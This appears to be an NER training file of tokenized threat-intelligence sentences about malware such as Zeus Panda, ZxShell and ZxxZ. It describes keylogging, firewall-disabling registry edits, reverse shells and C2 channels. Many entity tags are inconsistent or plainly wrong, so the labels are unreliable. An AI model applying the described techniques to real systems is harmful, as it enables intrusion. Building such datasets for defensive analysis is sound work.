- "tokens": [ - "ZeroT", - "gathers", - "the", - "victim's", - "IP", - "address", - "and", - "domain", - "information,", - "and", - "then", - "sends", - "it", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZeroT", - "has", - "used", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "ZeroT", - "can", - "add", - "a", - "new", - "service", - "to", - "ensure", - "PlugX", - "persists", - "on", - "the", - "system", - "when", - "delivered", - "as", - "another", - "payload", - "onto", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "variants", - "of", - "the", - "Zeroaccess", - "Trojan", - "have", - "been", - "known", - "to", - "store", - "data", - "in", - "Extended", - "Attributes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeroaccess", - "is", - "a", - "kernel-mode", - "rootkit." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "can", - "hook", - "GetClipboardData", - "function", - "to", - "watch", - "for", - "clipboard", - "pastes", - "to", - "collect." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "obfuscates", - "the", - "macro", - "commands", - "in", - "its", - "initial", - "payload." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "can", - "launch", - "remote", - "scripts", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "hooks", - "processes", - "by", - "leveraging", - "its", - "own", - "IAT", - "hooked", - "functions." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "decrypts", - "strings", - "in", - "the", - "code", - "during", - "the", - "execution", - "process." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "encrypts", - "strings", - "with", - "XOR.", - "Zeus", - "Panda", - "also", - "encrypts", - "all", - "configuration", - "and", - "settings", - "in", - "AES", - "and", - "RC4." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "has", - "a", - "command", - "to", - "delete", - "a", - "file.", - "It", - "also", - "can", - "uninstall", - "scripts", - "and", - "delete", - "files", - "to", - "cover", - "its", - "track." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "searches", - "for", - "specific", - "directories", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "can", - "download", - "additional", - "malware", - "plug-in", - "modules", - "and", - "execute", - "them", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "can", - "perform", - "keylogging", - "on", - "the", - "victim’s", - "machine", - "by", - "hooking", - "the", - "functions", - "TranslateMessage", - "and", - "WM_KEYDOWN." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "modifies", - "several", - "Registry", - "keys", - "under", - "<code>HKCU\\Software\\Microsoft\\Internet", - "Explorer\\", - "PhishingFilter\\</code>", - "to", - "disable", - "phishing", - "filters." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "checks", - "processes", - "on", - "the", - "system", - "and", - "if", - "they", - "meet", - "the", - "necessary", - "requirements,", - "it", - "injects", - "into", - "that", - "process." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "uses", - "PowerShell", - "to", - "download", - "and", - "execute", - "the", - "payload." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "checks", - "for", - "running", - "processes", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "checks", - "for", - "the", - "existence", - "of", - "a", - "Registry", - "key", - "and", - "if", - "it", - "contains", - "certain", - "values." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "adds", - "persistence", - "by", - "creating", - "Registry", - "Run", - "keys." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "can", - "take", - "screenshots", - "of", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "checks", - "to", - "see", - "if", - "anti-virus,", - "anti-spyware,", - "or", - "firewall", - "products", - "are", - "installed", - "in", - "the", - "victim’s", - "environment." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "collects", - "the", - "OS", - "version,", - "system", - "architecture,", - "computer", - "name,", - "product", - "ID,", - "install", - "date,", - "and", - "information", - "on", - "the", - "keyboard", - "mapping", - "to", - "determine", - "the", - "language", - "used", - "on", - "the", - "system." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "queries", - "the", - "system's", - "keyboard", - "mapping", - "to", - "determine", - "the", - "language", - "used", - "on", - "the", - "system.", - "It", - "will", - "terminate", - "execution", - "if", - "it", - "detects", - "LANG_RUSSIAN,", - "LANG_BELARUSIAN,", - "LANG_KAZAK,", - "or", - "LANG_UKRAINIAN." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "collects", - "the", - "current", - "system", - "time", - "(UTC)", - "and", - "sends", - "it", - "back", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "uses", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zeus", - "Panda", - "can", - "launch", - "an", - "interface", - "where", - "it", - "can", - "execute", - "several", - "commands", - "on", - "the", - "victim’s", - "PC." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zox", - "has", - "the", - "ability", - "to", - "upload", - "files", - "from", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zox", - "has", - "been", - "encoded", - "with", - "Base64." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zox", - "has", - "the", - "ability", - "to", - "leverage", - "local", - "and", - "remote", - "exploits", - "to", - "escalate", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zox", - "can", - "enumerate", - "files", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zox", - "can", - "download", - "files", - "to", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zox", - "has", - "the", - "ability", - "to", - "list", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Zox", - "has", - "the", - "ability", - "to", - "use", - "SMB", - "for", - "communication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Zox", - "has", - "used", - "the", - ".PNG", - "file", - "format", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zox", - "can", - "enumerate", - "attached", - "drives." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "has", - "a", - "command", - "to", - "clear", - "system", - "event", - "logs." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "has", - "a", - "command", - "called", - "RunAs,", - "which", - "creates", - "a", - "new", - "process", - "as", - "another", - "user", - "or", - "process", - "context." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "hooks", - "several", - "API", - "functions", - "to", - "spawn", - "system", - "threads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "can", - "transfer", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "can", - "disable", - "the", - "firewall", - "by", - "modifying", - "the", - "registry", - "key", - "<code>HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Purp", - "I-Features", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "ZxShell", - "can", - "kill", - "AV", - "products'", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "is", - "injected", - "into", - "a", - "shared", - "SVCHOST", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "has", - "a", - "feature", - "to", - "perform", - "SYN", - "flood", - "attack", - "on", - "a", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "has", - "been", - "dropped", - "through", - "exploitation", - "of", - "CVE-2011-2462,", - "CVE-2013-3163,", - "and", - "CVE-2014-0322." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "ZxShell", - "can", - "delete", - "files", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "has", - "used", - "FTP", - "for", - "C2", - "connections." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "has", - "a", - "command", - "to", - "open", - "a", - "file", - "manager", - "and", - "explorer", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "has", - "a", - "command", - "to", - "transfer", - "files", - "from", - "a", - "remote", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "has", - "a", - "feature", - "to", - "capture", - "a", - "remote", - "computer's", - "keystrokes", - "using", - "a", - "keylogger." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "ZxShell", - "has", - "a", - "feature", - "to", - "create", - "local", - "user", - "accounts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "can", - "create", - "Registry", - "entries", - "to", - "enable", - "services", - "to", - "run." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "can", - "leverage", - "native", - "API", - "including", - "<code>RegisterServiceCtrlHandler", - "</code>", - "to", - "register", - "a", - "service.RegisterServiceCtrlHandler" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "ZxShell", - "can", - "launch", - "port", - "scans." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "can", - "use", - "ports", - "1985", - "and", - "1986", - "in", - "HTTP/S", - "communication." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Time", - "O", - "B-Time", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "has", - "a", - "command,", - "ps,", - "to", - "obtain", - "a", - "listing", - "of", - "processes", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "can", - "set", - "up", - "an", - "HTTP", - "or", - "SOCKS", - "proxy." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "can", - "query", - "the", - "netsvc", - "group", - "value", - "data", - "located", - "in", - "the", - "svchost", - "group", - "Registry", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "has", - "remote", - "desktop", - "functionality." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "has", - "used", - "rundll32.exe", - "to", - "execute", - "other", - "DLLs", - "and", - "named", - "pipes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "can", - "capture", - "screenshots." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "ZxShell", - "can", - "create", - "a", - "new", - "service", - "for", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "can", - "collect", - "the", - "local", - "hostname,", - "operating", - "system", - "details,", - "CPU", - "speed,", - "and", - "total", - "physical", - "memory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "can", - "collect", - "the", - "owner", - "and", - "organization", - "information", - "from", - "the", - "target", - "workstation." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "can", - "check", - "the", - "services", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "supports", - "functionality", - "for", - "VNC", - "sessions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "has", - "a", - "command", - "to", - "perform", - "video", - "device", - "spying." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "has", - "used", - "HTTP", - "for", - "C2", - "connections." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "can", - "launch", - "a", - "reverse", - "command", - "shell." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxShell", - "can", - "create", - "a", - "new", - "service", - "using", - "the", - "service", - "parser", - "function", - "ProcessScCommand." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxxZ", - "can", - "collect", - "data", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxxZ", - "has", - "used", - "a", - "XOR", - "key", - "to", - "decrypt", - "strings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxxZ", - "has", - "been", - "encoded", - "to", - "avoid", - "detection", - "from", - "static", - "analysis", - "tools." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxxZ", - "can", - "download", - "and", - "execute", - "additional", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "ZxxZ", - "has", - "relied", - "on", - "victims", - "to", - "open", - "a", - "malicious", - "attachment", - "delivered", - "via", - "email." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "ZxxZ", - "has", - "been", - "disguised", - "as", - "a", - "Windows", - "security", - "update", - "service." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxxZ", - "has", - "used", - "API", - "functions", - "such", - "as", - "`Process32First`,", - "`Process32Next`,", - "and", - "`ShellExecuteA`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "ZxxZ", - "has", - "created", - "a", - "snapshot", - "of", - "running", - "processes", - "using", - "`CreateToolhelp32Snapshot`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxxZ", - "can", - "search", - "the", - "registry", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxxZ", - "has", - "used", - "scheduled", - "tasks", - "for", - "persistence", - "and", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxxZ", - "can", - "search", - "a", - "compromised", - "host", - "to", - "determine", - "if", - "it", - "is", - "running", - "Windows", - "Defender", - "or", - "Kasperky", - "antivirus." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O" - ] - }, - { - "tokens": [ - "ZxxZ", - "has", - "been", - "distributed", - "via", - "spearphishing", - "emails,", - "usually", - "containing", - "a", - "malicious", - "RTF", - "or", - "Excel", - "attachment." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "ZxxZ", - "has", - "collected", - "the", - "host", - "name", - "and", - "operating", - "system", - "product", - "name", - "from", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZxxZ", - "can", - "collect", - "the", - "username", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "adbupd", - "contains", - "a", - "copy", - "of", - "the", - "OpenSSL", - "library", - "to", - "encrypt", - "C2", - "traffic." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "adbupd", - "can", - "run", - "a", - "copy", - "of", - "cmd.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "adbupd", - "can", - "use", - "a", - "WMI", - "script", - "to", - "achieve", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "at", - "can", - "be", - "used", - "to", - "schedule", - "a", - "task", - "on", - "a", - "system", - "to", - "be", - "executed", - "at", - "a", - "specific", - "date", - "or", - "time." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "build_downer", - "has", - "the", - "ability", - "to", - "download", - "files", - "from", - "C2", - "to", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "build_downer", - "has", - "added", - "itself", - "to", - "the", - "Registry", - "Run", - "key", - "as", - "\"NVIDIA\"", - "to", - "appear", - "legitimate." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "build_downer", - "has", - "the", - "ability", - "to", - "use", - "the", - "<code>WinExec</code>", - "API", - "to", - "execute", - "malware", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Way", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "build_downer", - "has", - "the", - "ability", - "to", - "add", - "itself", - "to", - "the", - "Registry", - "Run", - "key", - "for", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "build_downer", - "has", - "the", - "ability", - "to", - "detect", - "if", - "the", - "infected", - "host", - "is", - "running", - "an", - "anti-virus", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "build_downer", - "can", - "extract", - "malware", - "from", - "a", - "downloaded", - "JPEG." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "build_downer", - "has", - "the", - "ability", - "to", - "send", - "system", - "volume", - "information", - "to", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "build_downer", - "has", - "the", - "ability", - "to", - "determine", - "the", - "local", - "time", - "to", - "ensure", - "malware", - "installation", - "only", - "happens", - "during", - "the", - "hours", - "that", - "the", - "infected", - "system", - "is", - "active." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ccf32", - "has", - "used", - "`xcopy", - "\\\\<target_host>\\c$\\users\\public\\path.7z", - "c:\\users\\public\\bin\\<target_host>.7z", - "/H", - "/Y`", - "to", - "archive", - "collected", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ccf32", - "can", - "be", - "used", - "to", - "automatically", - "collect", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ccf32", - "can", - "collect", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ccf32", - "can", - "upload", - "collected", - "data", - "and", - "files", - "to", - "an", - "FTP", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ccf32", - "can", - "delete", - "files", - "and", - "folders", - "from", - "compromised", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ccf32", - "can", - "parse", - "collected", - "files", - "to", - "identify", - "specific", - "file", - "extensions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ccf32", - "has", - "created", - "a", - "hidden", - "directory", 